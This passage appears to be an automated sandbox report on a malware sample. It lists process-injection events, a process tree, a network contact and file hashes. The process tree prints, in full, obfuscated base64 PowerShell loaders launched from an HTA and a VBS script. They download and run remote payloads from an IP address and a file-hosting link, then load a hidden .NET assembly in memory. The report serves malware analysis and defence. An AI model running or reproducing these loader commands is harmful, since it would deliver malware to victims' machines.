PID 2856 wrote to memory of 2732 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2732 wrote to memory of 2884 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2884 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2884 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2884 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2856 wrote to memory of 1580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 1580 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestpartaroundtheworldtogetmethingsfornewone.hta"

C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE

"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\soy6e5qa.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES53F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC52F.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command

Network

Country Destination Domain Proto
US 198.46.178.167:80 198.46.178.167 tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 94812a36a43c517891a5a6cddbe44402
SHA1 b62825f3af5b4bbdea6f722f38d6bd84344a13d6
SHA256 47a50ad3ecca72ea5b0db87c5676c177863d28b6cc7d9d73b00dcc485a9a7876
SHA512 dcb488cd01e5707cce0690dbdb13fdf9979c92ba8d48abae98168527bcd65c81ae96b426b2822db776832c3815e3561688a494406eca353c4baec1ae47ff26f4

\??\c:\Users\Admin\AppData\Local\Temp\soy6e5qa.cmdline

MD5 6491e6daf7de2be3903fe98ae93ec375
SHA1 4f73dfd9840f8b32f334dffde67cd5ec38a99334
SHA256 e923c9f6efd364d3541fe694c794dc01bf964b919e2f13d3dd3621c712a962ac
SHA512 c5db15feed84204726d9588638b919b7ba54dbaee4673dd816bbcde9e70b96489190417c20fe5d309671c94c18492c3491bf83a43436792e12e75d63226de8a0

\??\c:\Users\Admin\AppData\Local\Temp\soy6e5qa.0.cs

MD5 0b9734ed54c4f41d0c94957b007eb3d5
SHA1 ebabbb2d826295a994ba691d921a4c7c5ed506d1
SHA256 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
SHA512 d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

\??\c:\Users\Admin\AppData\Local\Temp\CSC52F.tmp

MD5 b173381b1968cb80735508efe37bd0d3
SHA1 bde73bf4b121e53a32ac62d8ab17e708b68802da
SHA256 7f235374e56025cd94d68e3890fe574dc574adc75431c4f20dd1c4abe90ee52f
SHA512 358c93a46a2a74da021e87409c94cd8d04d620e3e143fd5e7edeffd5c3e004675680a5e23c2965fd77bcdb0e19a39cdb9fdfebb55bda5492e0d1dead36d53128

C:\Users\Admin\AppData\Local\Temp\RES53F.tmp

MD5 20a69bbde25b7a8c4035296ec58d4219
SHA1 069cc5b7e3a4efef96eae87ac9974aaca4b66cd6
SHA256 1ab7835c8a3f1db47636e06a5a39e323746da643b96db3f195aff0bc2ee37ac2
SHA512 ba2102b72c626a3a7a6c44022471710f4693905139771fab9b35a149a0ee99b2e12982a066c75e921bb377cd02f9d6b919f608b4635a185ace7f33946ecf3de5

C:\Users\Admin\AppData\Local\Temp\soy6e5qa.dll

MD5 e028d623b1eaece643db5b20b713d4d9
SHA1 89cb49d56a3e5fdc78792dded26da9faf6518d93
SHA256 27d7e39315c999582906026697328b79aa5be5efa8111c8639544d24ac10e91a
SHA512 163b5ef6046486e1f0d798da51aaf129ec3d7f886dc4f41869a452055f9997bd12a762eafcf368d1565bd6fe4d3a0108e85ec3c324c1cd101cebcd63446d1e18

C:\Users\Admin\AppData\Local\Temp\soy6e5qa.pdb

MD5 d77ace29fa4f935b358ffebd22629134
SHA1 f404da4fa8e5814c18003e9bc804e5fce76096bc
SHA256 231817fe805a26c0516b21b3b214ced23c81d298b4bc50f0a70c423ec95e742c
SHA512 a0617c056bcc08693921acccde82bb7238d504f0d02bf585b89225a8a74ef8f5b10c93ed20724a41fec5ea45acc3546518c5c043da34a7022b266dd83204dfa2

C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS

MD5 4f46597a54e903c400cac4db5a222ecb
SHA1 0a2f30da05a532bfbddaba3af235011d60db8fc8
SHA256 ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
SHA512 ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e